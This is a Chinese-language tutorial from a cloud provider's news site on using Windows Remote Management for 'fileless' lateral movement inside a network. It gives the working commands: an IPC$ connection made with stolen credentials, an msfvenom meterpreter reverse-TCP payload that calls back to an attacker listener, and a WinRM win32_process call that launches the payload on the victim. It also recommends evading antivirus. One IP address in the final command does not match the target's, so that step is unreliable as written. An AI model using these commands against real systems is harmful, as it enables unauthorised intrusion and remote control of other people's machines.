温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何利用WinRM实现内网无文件攻击反弹shell

发布时间:2021-11-23 22:43:00 来源:亿速云 阅读:272 作者:柒染 栏目:网络安全

如何利用WinRM实现内网无文件攻击反弹shell,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

0x00:前言

WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80端口或者443端口。这样一来,我们就可以在对方有设置防火墙的情况下远程管理这台服务器了。

Server2008R2及往上的系统中默认中都开启该服务,从Server2012系统后开始,该WinRM服务便被设置为默认开启。Win7系统中却默认安装此WinRM服务,但是默认为禁用状态,Win8系统和Win10系统也都默认开启WinRM服务。

WinRM的好处在于,这种远程连接不容易被察觉到,也不会占用远程连接数!

0x01:环境准备

  1. WinRM会用到5985、5986 端口,所以防火墙必须做开放处理。

  2. 用Administrator账户登录攻击机器

  3. 前提知道被攻击方的用户登录账户密码

  4. Windows操作系统中,默认是开启共享IPC$的

  5. IP:192.168.124.30(server2016)  

IP:192.168.124.20(win7)

IP:192.168.124.32(Kali)

0x02:攻击过程

一、快速在(server2016)运行winrm

命令:winrm quickconfig

如何利用WinRM实现内网无文件攻击反弹shell

二、net use连接(win7)

命令:net use \\192.168.124.20\ipc$ “密码” /user:“用户名”

如何利用WinRM实现内网无文件攻击反弹shell

尝试调用本地”calc.exe”.

如何利用WinRM实现内网无文件攻击反弹shell

成功

  1. 在(win7)中需要被远程访问的文件,开启文件共享。

如何利用WinRM实现内网无文件攻击反弹shell

开启共享文件夹,并添加访问用户的权限,使其能够远程访问。

四、在(win7)中放置木马,并且用(kali)接收反弹的shell

  1. 生成shellcode

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.124.32 lport=7777 -f exe -o ./luomiweixiong.exe

如何利用WinRM实现内网无文件攻击反弹shell

  1. 把”luomiweixiong.exe”放在(win7)的C盘根目录.

如何利用WinRM实现内网无文件攻击反弹shell

3、kali启动监听shell模式

如何利用WinRM实现内网无文件攻击反弹shell

  1. 利用(server2016)的WinRM 实现内网无文件攻击反弹shell

  2. 在(server2016)中执行以下命令

winrm invoke create wmicimv2/win32_process @{commandline="\\192.168.12.20\c\luomiweixiong.exe"}

如何利用WinRM实现内网无文件攻击反弹shell

如何利用WinRM实现内网无文件攻击反弹shell

如何利用WinRM实现内网无文件攻击反弹shell

反弹成功

0x03:总结

  1. shellcode还可以做一些免杀处理,使其更加的完美。

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI